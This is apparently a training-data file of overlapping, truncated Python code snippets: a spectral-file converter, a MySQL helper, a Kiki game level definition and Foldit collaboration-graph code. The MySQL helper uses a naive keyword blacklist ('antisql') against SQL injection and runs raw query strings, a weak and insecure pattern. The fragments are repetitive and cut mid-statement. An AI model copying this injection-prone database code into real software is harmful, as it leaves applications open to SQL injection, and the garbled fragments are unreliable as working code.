pr_spec2xyz INPUT OUTPUT import", "pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as pr # Main", "import struct import pypearray as pr # Main if __name__ == '__main__': if", "= sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f:", "if len(sys.argv) != 3: print(\"Not enough arguments given. Need an input and output", "Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given.", "= pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1, inputFile.height): for", "in range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for", "'wb') as f: for i in range(1, inputFile.height): for j in range(1, inputFile.width):", "sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for" ]
[ "antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor()", "return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close()", "def antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content: return", "res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text)", "if antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur =", "content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall()", "conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur =", "1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit()", "cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) cur.close()", "0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return", "MySQLdb def antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content:", "in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text)", "conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) cur.close() conn.commit() conn.close()", "antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content: return 1", "(len(antistr)): if antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur", "antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content: return 1 return", "conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) cur.close() conn.commit()", "conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text):", "range (len(antistr)): if antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8')", "i in range (len(antistr)): if antistr[i] in content: return 1 return 0 def", "cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8')", "for i in range (len(antistr)): if antistr[i] in content: return 1 return 0", "= conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur", "in range (len(antistr)): if antistr[i] in content: return 1 return 0 def sql_select(text):", "import MySQLdb def antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in", "cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor()", "return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close()", "sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def", "def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res" ]
[ "( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the", "\"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove", "i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i),", "(1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)])", "\"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize()", "1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for", "1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1,", "i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i,", "<NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\":", "(KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0,", "# ................................................................................................................. # Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] =", "(KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1,", "1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone,", "s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1,", "[world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1,", "(i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)])", "{ \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\"", "+ \\ \"to get to the exit,\\nmove the stones\", ), \"player\": { \"position\":", "design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\":", "the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\",", "world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter", "get to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\":", "i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1,", "\"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to", "[ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s", "for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos", "i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i,", "in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter", "\\ \"to get to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0),", "i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i,", "= { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the", "-1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2,", "of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9),", "the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ {", "= world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i),", "[-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1,", "\"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the", "{ \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s =", "world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1),", "level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to", "(KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1,", "world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1,", "\"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\"", "(-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1,", "i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone,", "}, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\":", "\"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" +", "(i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]:", "4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(),", "), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1,", "2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos", "exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\":", "to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\", ),", "-1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1,", "<reponame>triffid/kiki<gh_stars>1-10 # ................................................................................................................. # Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"]", "1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i", "\"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i in [-2,", "world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2,", "1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i in", "(-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i,", "world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter", "0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0, i)) \"\"\",", "-1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\", "\"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1,", "[world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1,", "\"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for", "1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4,", "(0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i in [-2, 2]:", "'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\":", "exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\", ), \"player\": {", "i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(),", "-1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0,", "[-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i,", "(9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get", "\"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\":", "for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1,", "world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0,", "1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0))", "the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\", ), \"player\":", "stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\":", "[world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i,", "{ \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0),", "# ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": (", "(0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ],", "i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\", "Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\",", "], \"create\": \"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone,", "world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in", "1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1,", "\"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\",", "(KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i,", "# Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\":", "\"to get to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), },", "world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0, i))", "world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i,", "}, ], \"create\": \"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly", "world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i),", "world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1),", "by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\",", "\"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to", "-2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0))", "2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1,", "in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0,", "-1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(),", "to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [", "i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i,", "\"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i", "\"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\", "world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter", "1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly", "world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1),", "(1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)])", "-1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i,", "world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter", "0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0, i)) \"\"\", }", "-1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1,", "\"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), },", "i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly", "................................................................................................................. # Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = {", "-1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos", "world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1),", "\"create\": \"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter", "................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget" ]
[ "def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df = data[data.pid", "1, c) for c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py')", "print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in cur.children]) if", "logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda", "in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs #", "# edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end", "team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r:", "best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy", "for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped =", "roots = sum(([p for p in pdbs if p.scoretype == '1' and get_tag(p)", "pd import numpy as np import matplotlib.pyplot as plt from graphviz import Digraph", "[]) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda", "x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group", "key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = { # uid: {k:", "g in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters", "uid: {k: min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda", "r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1)", "uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])}", "* c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child)", "in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" + str(i) raise", "df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines", "# uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped =", "enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid in sids: return", "prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid,", "for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if", "x in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']", "0.1 + 0.9 * (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid,", "for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values,", "[]) + ([p for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines", "list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in", "collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c:", "if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for", "sids = [p.sid for p in line.pdb_infos] if s.sid in sids: return s.uid", "key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for", "for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid:", ">= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] =", "i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid']", "in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag = get_tag(root) sids", "evolves))) # evoling_start = min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28,", "[], {c.name: c.energy * c.weight for c in root.energy_components}, tag, None, None, [])", "NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i", "if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args =", "c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for", "uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve", "sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1 or", "import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing", "class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag", "| dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname),", "df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p in", "collab.children] # while len(front) > 0: # ntab, cur = front.pop() # print(\"", "in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line graphviz tools", "print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos", "# print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c in collab.children]", "s.uid for i, line in enumerate(lines): sids = [p.sid for p in line.pdb_infos]", "x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict = {} #", "& edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group", "in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos", "in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs)", "get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid])", "in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] ==", "Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters =", "in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for", "pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map(", "round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\":", "(int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return", "end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for", "[])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid)", "{pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for", "active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) ==", "= Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid,", "[uid for _, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d:", "loaded in a shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves,", "for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if", "= c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce':", "key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = {", "= min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy *", "print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c in collab.children] #", "e.uid), lambda e: e.uid) # uid_source_grouped = { # uid: {k: 